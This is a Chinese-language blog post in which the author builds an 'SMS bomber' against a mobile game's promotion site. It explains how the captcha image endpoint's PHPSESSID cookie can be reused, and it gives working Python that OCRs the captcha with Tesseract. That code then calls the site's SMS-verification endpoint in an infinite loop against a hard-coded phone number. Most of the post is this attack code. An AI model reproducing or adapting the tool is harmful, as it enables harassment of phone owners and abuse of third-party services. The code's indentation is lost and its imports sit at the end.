前言
- 复习周闲来无事抢个鬼泣手游内测资格,特喵的全国人抢100个资格,神一般的手速都抢不到。
- 重点来了,我发现这个网站登录获取验证码不需要等待时间,于是,一手F12,开始分析。
找思路
- 首先,打开network——>点击登录,找到获取验证码图片的接口,如下:
- 然后,填写手机号,输入验证码,点击验证,找到验证输入的验证码的接口,如下:
- 用PostMan对两个接口请求一下,发现获取验证码图片的接口会携带一个Cookie,内容包含PHPSESSID,而上传验证码的接口的Header中的Cookie正好需要一个PHPSESSID,拼接一下就OK。
- 有了图片接口和验证接口,那么就可以白嫖了,白嫖验证码接口,嘿嘿嘿。但是这不是最终目的,最终目的是做短信轰炸机,既然是轰炸机,肯定不能自己输入验证码,那样效率太低了,让机器自己识别验证码。这里调用Python的图片转文字库pytesseract,当然,更好的做法是调用百度API,后面可能会改进。
- 思路有了。
上代码
def getImageAndCookie():
response = requests.session().get("http://dmc.yunchanggame.com/activity/public/verify/get_image")
if response.status_code == 200:
open("C:\\Users\\HP\\Desktop\\Test\\1.png",'wb').write(response.content)
mImage = Image.open("C:\\Users\\HP\\Desktop\\Test\\1.png")
mImage.show()
cookie = response.cookies.get_dict()
print("下载完成!得到cookie:"+cookie['PHPSESSID'])
return cookie['PHPSESSID'],mImage
else:
print("连接错误!")
def processing_image(mImage):
img = mImage.convert("L")
pixdata = img.load()
w, h = img.size
threshold = 160
for y in range(h):
for x in range(w):
if pixdata[x, y] < threshold:
pixdata[x, y] = 0
else:
pixdata[x, y] = 255
return img
def delete_spot(image):
images = processing_image(image)
data = images.getdata()
w, h = images.size
black_point = 0
for x in range(1, w - 1):
for y in range(1, h - 1):
mid_pixel = data[w * y + x]
if mid_pixel < 50:
top_pixel = data[w * (y - 1) + x]
left_pixel = data[w * y + (x - 1)]
down_pixel = data[w * (y + 1) + x]
right_pixel = data[w * y + (x + 1)]
if top_pixel < 10:
black_point += 1
if left_pixel < 10:
black_point += 1
if down_pixel < 10:
black_point += 1
if right_pixel < 10:
black_point += 1
if black_point < 1:
images.putpixel((x, y), 255)
black_point = 0
return images
def image_str(mImage):
image = delete_spot(mImage)
pytesseract.pytesseract.tesseract_cmd = r"C:\Program Files\Tesseract-OCR\tesseract.exe"
result = pytesseract.image_to_string(image)
resultj = re.sub(u"([^\u4e00-\u9fa5\u0030-\u0039\u0041-\u005a\u0061-\u007a])", "", result)
result_four = resultj[0:4]
mResult = ""
for i in result_four:
print(i)
mResult = mResult+i
return mResult
def InputYanzheng(Phone,code,Cookie):
url = "http://dmc.yunchanggame.com/activity/public/verify/get_sms"
mHeaders = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0",
"Cookie":"Hm_lvt_618160d195dc7579727a2a268f7791af=1592534551; Hm_lpvt_618160d195dc7579727a2a268f7791af=1592534710; Hm_lvt_d25a519a4cfe0e755bd071d9c200a580=1592534536; Hm_lpvt_d25a519a4cfe0e755bd071d9c200a580=1592534536; PHPSESSID="+Cookie+"; sid="
}
data = {
"image_code":code,
"phone":Phone
}
response = requests.post(url,data=data,headers=mHeaders).text
mRes = json.loads(response)
print(mRes['message'])
if __name__ == '__main__':
while True:
Cookie,mImage = getImageAndCookie()
Code = image_str(mImage)
InputYanzheng("18186156959",Code,Cookie)
import requests
import json
import re
from PIL import Image
import pytesseract
后记
- 验证码难于识别,所以较大几率会出现验证码为空或验证码错误的情况,后续可能会更新百度API识别方法。
- 如有大佬发现文章错误,或代码错误,烦请指正,感激不尽。
- 创作不易,转载请注明出处,感谢。